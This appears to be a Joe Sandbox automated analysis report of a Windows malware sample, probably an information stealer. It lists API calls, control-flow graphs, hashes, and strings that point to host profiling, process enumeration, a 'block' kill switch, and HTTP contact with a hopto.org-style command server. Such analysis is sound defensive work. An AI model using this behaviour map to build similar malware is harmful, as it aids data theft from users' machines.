                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00081746
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00081763
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00081771
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0008178D
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 000817A9
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000817BE
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000817C8
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 000817CF
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 000817DB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                                                                    • String ID: %s%s$delays.tmp
                                                                                                                                                                                                                                                    • API String ID: 1620473967-1413376734
                                                                                                                                                                                                                                                    • Opcode ID: cb6e10b77524542e000147d16240831f9d62708a1796d8348c9f5a4f3aa105e4
                                                                                                                                                                                                                                                    • Instruction ID: 421788442c931ce5198872191bfd453d5768e54e360e01b5d3ea86d89f8f7f30
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb6e10b77524542e000147d16240831f9d62708a1796d8348c9f5a4f3aa105e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 284184B1900618ABEB206B71DC4DFEF7BBDEF89751F1006A9B10AE1051DA358955CF60

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1531 97041-970da call ae390 call 904e7 call 90c53 call 90609 * 3 call 9058d call 82920 * 3 1552 970e3-970f4 OpenEventA 1531->1552 1553 970dc-970dd CloseHandle 1552->1553 1554 970f6-971ec CreateEventA call 904e7 call 98111 call 90549 * 2 1552->1554 1553->1552 1563 971f3-97208 1554->1563 1563->1563 1564 9720a 1563->1564 1565 97211-97226 1564->1565 1565->1565 1566 97228-9722d 1565->1566 1567 97234-97252 1566->1567 1567->1567 1568 97254-97256 1567->1568 1569 9725d-9727b 1568->1569 1569->1569 1570 9727d 1569->1570 1571 97284-9728f call 981fd 1570->1571 1574 97291-9729a 1571->1574 1575 9729b-972a6 call 98225 1574->1575 1578 972a8-972d1 call 82f12 call 98950 call 8113b 1575->1578 1585 97597-9774e call 91c4a call 9058d call 82920 call 904e7 call 90609 call 905c7 call 9058d call 82920 * 2 CreateDirectoryA call 81cfd call 969b6 call 9824d call 96d8b call 9058d * 2 call 90519 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 InternetOpenA * 2 call 90519 call 904e7 call 909a2 call 90519 call 84b2e call 939c2 1578->1585 1586 972d7-97571 call 904e7 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 9257f 1578->1586 1700 9775b-9789e call 904e7 call 81cfd call 85f39 call 9343f call 904e7 call 81cfd call 85f39 call 93259 call 904e7 call 81cfd call 85f39 call 93390 call 81cfd call 93b86 call 90519 call 904e7 call 85237 call 81cfd call 8eabc 1585->1700 1701 97750 1585->1701 1842 97576-97578 1586->1842 1778 9790e-97916 1700->1778 1779 978a0-97908 call 904e7 call 81cfd call 85f39 call 934d8 call 81cfd call 8274e 1700->1779 1701->1700 1783 97918-97989 call 904e7 call 81cfd call 85f39 call 93198 call 81cfd call 9310c 1778->1783 1784 9798f-97a0d call 904e7 call 81cfd call 85f39 call 935a8 call 81cfd call 95392 1778->1784 1779->1778 1783->1784 1833 97a2d-97a34 1784->1833 1834 97a0f-97a2a call 81cfd call 9566f call 81cfd call 96fb7 1784->1834 1835 97a4f-97a56 1833->1835 1836 97a36-97a4c call 81cfd call 95df7 1833->1836 1834->1833 1840 97a58-97a6e call 81cfd call 96330 1835->1840 1841 97a71-97a78 1835->1841 1836->1835 1840->1841 1849 97a7a-97a93 call 81cfd call 964bd 1841->1849 1850 97aa0-97aa6 1841->1850 1846 9757a-97584 call 9cc6c 1842->1846 1847 9758e-97592 call 82920 1842->1847 1846->1847 1847->1585 1849->1850 1852 97aa8-97aaf 1850->1852 1853 97a95-97a9a Sleep 1850->1853 1861 97aca-97ad1 1852->1861 1862 97ab1-97ac7 call 81cfd call 91f55 1852->1862 1853->1850 1868 97b4a-97b8c call 904e7 call 81cfd call 85f39 call 82920 call 8113b 1861->1868 1869 97ad3-97b44 call 904e7 call 81cfd call 85f39 call 93198 call 81cfd call 9310c 1861->1869 1862->1861 1898 97ff0-9803d call 92541 CloseHandle call 81cfd call 98271 call 82920 * 2 1868->1898 1899 97b92-97e33 call 904e7 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 9257f 1868->1899 1869->1868 1922 9803e-98049 call 930e9 1898->1922 2062 97e39-97f14 call 9cd21 call 904e7 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 1899->2062 2063 97fe7-97feb call 82920 1899->2063 1928 9804b-98054 1922->1928 1930 98055-98060 call 9536f 1928->1930 1936 98062-9806b 1930->1936 1938 9806c-98077 call 981e2 1936->1938 1944 98079-98082 1938->1944 1946 98083-9808e call 981a8 1944->1946 1952 98090-9809c 1946->1952 1954 9809e-980b1 call 82920 * 2 1952->1954 1964 980b3 1954->1964 1966 980ba-980cd call 82920 * 2 1964->1966 1976 980cf-98110 call 96d8b call 81cde call 82920 * 2 call 9d016 1966->1976 2099 97f15-97f20 call 98225 2062->2099 2063->1898 2102 97f22-97f7e call 904e7 call 90519 * 3 call 85482 2099->2102 2112 97f83-97fd0 call 93198 call 81cfd call 9310c 2102->2112 2119 97fd1-97fdc call 930e9 2112->2119 2122 97fde-97fe2 call 82920 2119->2122 2122->2063
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000813B9), ref: 00090C5F
                                                                                                                                                                                                                                                      • Part of subcall function 00090C53: HeapAlloc.KERNEL32(00000000,?,?,?,000813B9), ref: 00090C66
                                                                                                                                                                                                                                                      • Part of subcall function 00090C53: GetUserNameA.ADVAPI32(00000000,000813B9), ref: 00090C7A
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0009858F), ref: 000970DD
                                                                                                                                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,?,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000970EC
                                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,000B66DA), ref: 0009760A
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000976CB
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000976E4
                                                                                                                                                                                                                                                      • Part of subcall function 00084B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00084BCD
                                                                                                                                                                                                                                                      • Part of subcall function 00084B2E: StrCmpCA.SHLWAPI(?), ref: 00084BEB
                                                                                                                                                                                                                                                      • Part of subcall function 000939C2: StrCmpCA.SHLWAPI(?,block,?,?,00097744), ref: 000939D7
                                                                                                                                                                                                                                                      • Part of subcall function 000939C2: ExitProcess.KERNEL32 ref: 000939E2
                                                                                                                                                                                                                                                      • Part of subcall function 00085F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00085FD8
                                                                                                                                                                                                                                                      • Part of subcall function 00085F39: StrCmpCA.SHLWAPI(?), ref: 00085FF6
                                                                                                                                                                                                                                                      • Part of subcall function 00093198: strtok_s.MSVCRT ref: 000931B7
                                                                                                                                                                                                                                                      • Part of subcall function 00093198: strtok_s.MSVCRT ref: 0009323A
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00097A9A
                                                                                                                                                                                                                                                      • Part of subcall function 00085F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0008618E
                                                                                                                                                                                                                                                      • Part of subcall function 00085F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 000861D2
                                                                                                                                                                                                                                                      • Part of subcall function 00085F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00086200
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0009858F), ref: 00097100
                                                                                                                                                                                                                                                      • Part of subcall function 0009257F: __EH_prolog3_catch_GS.LIBCMT ref: 00092589
                                                                                                                                                                                                                                                      • Part of subcall function 0009257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00097E31,.exe,000B6CCC,000B6CC8,000B6CC4,000B6CC0,000B6CBC,000B6CB8,000B6CB4,000B6CB0,000B6CAC,000B6CA8,000B6CA4), ref: 000925A8
                                                                                                                                                                                                                                                      • Part of subcall function 0009257F: Process32First.KERNEL32(00000000,00000128), ref: 000925B8
                                                                                                                                                                                                                                                      • Part of subcall function 0009257F: Process32Next.KERNEL32(00000000,00000128), ref: 000925CA
                                                                                                                                                                                                                                                      • Part of subcall function 0009257F: StrCmpCA.SHLWAPI(?), ref: 000925DC
                                                                                                                                                                                                                                                      • Part of subcall function 0009257F: CloseHandle.KERNEL32(00000000), ref: 000925F0
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00098000
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: .exe$.exe$2ee1445fc63bc20d0e7966867b13e0e1$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                                                                                                                                                    • API String ID: 305159127-2219833542
                                                                                                                                                                                                                                                    • Opcode ID: 02b6aee68f4f3b4077802caaa0e00e0db297ad34deaca6d2a608084aadc13994
                                                                                                                                                                                                                                                    • Instruction ID: 42fa10ba0a1617a814d068bed595c7a5728336931e435005a851d8d30719aab7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02b6aee68f4f3b4077802caaa0e00e0db297ad34deaca6d2a608084aadc13994
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2492FC325483559FCA20FF24D842ADEB7E5FF80700F414929F9D867162DB71AE0A9B93

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2254 85237-852c9 call 90519 call 84ab6 GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 2259 852cb 2254->2259 2260 852cd-852d3 2254->2260 2259->2260 2261 852d9-852ff InternetConnectA 2260->2261 2262 8544b-8546d InternetCloseHandle call 82920 * 2 2260->2262 2263 8543f-85445 InternetCloseHandle 2261->2263 2264 85305-85340 HttpOpenRequestA 2261->2264 2276 85473-85481 call 9d016 2262->2276 2263->2262 2266 85433-85439 InternetCloseHandle 2264->2266 2267 85346-85348 2264->2267 2266->2263 2269 8534a-85360 InternetSetOptionA 2267->2269 2270 85366-8539c HttpSendRequestA HttpQueryInfoA 2267->2270 2269->2270 2272 853bb-853bd 2270->2272 2273 8539e-853b6 call 82920 * 2 2270->2273 2272->2266 2277 853bf 2272->2277 2273->2276 2280 8542b-85431 2277->2280 2280->2266 2283 853c1-853e8 InternetReadFile 2280->2283 2283->2266 2285 853ea-85429 2283->2285 2285->2280 2285->2285
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0008527E
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00085285
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 000852A7
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 000852C1
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000852F1
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00085330
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00085360
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0008536B
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00085394
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 000853DA
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00085439
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00085445
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00085451
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID: GET$\x
                                                                                                                                                                                                                                                    • API String ID: 442264750-1510654650
                                                                                                                                                                                                                                                    • Opcode ID: 196554a47a95aea3e92c5a25c257ad09bb84b7a06f335cb362441dbe7c47c062
                                                                                                                                                                                                                                                    • Instruction ID: 7ed613147d549b64fd27813156f75d57d984386b49f881f66156955146177f27
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 196554a47a95aea3e92c5a25c257ad09bb84b7a06f335cb362441dbe7c47c062
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0511871901928AFDF21AF64EC89BEFBBB8FB08346F4100E5F549A6151D7705E818F50

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2332 91997-919fb call af09d CoInitializeEx CoInitializeSecurity CoCreateInstance 2336 91a01-91a2d CoSetProxyBlanket 2332->2336 2337 91aa0-91aa5 2332->2337 2339 91a31-91a33 2336->2339 2338 91ab9 call 904e7 2337->2338 2343 91abe-91ac5 call af142 2338->2343 2341 91a99-91a9e 2339->2341 2342 91a35-91a40 2339->2342 2341->2338 2344 91a93-91ab4 2342->2344 2345 91a42-91a57 2342->2345 2344->2338 2345->2344 2350 91a59-91a91 VariantInit call 91d42 call 904e7 VariantClear 2345->2350 2350->2343
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 0009199E
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000030,00093F67,?,AV: ,000B68C4,Install Date: ,000B68B0,00000000,Windows: ,000B68A0,Work Dir: In memory,000B6888), ref: 000919AD
                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000919BE
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(000B2F00,00000000,00000001,000B2E30,?), ref: 000919D8
                                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00091A0E
                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00091A5D
                                                                                                                                                                                                                                                      • Part of subcall function 00091D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00091A80,?), ref: 00091D4A
                                                                                                                                                                                                                                                      • Part of subcall function 00091D42: CharToOemW.USER32(?,00000000), ref: 00091D56
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00091A8B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
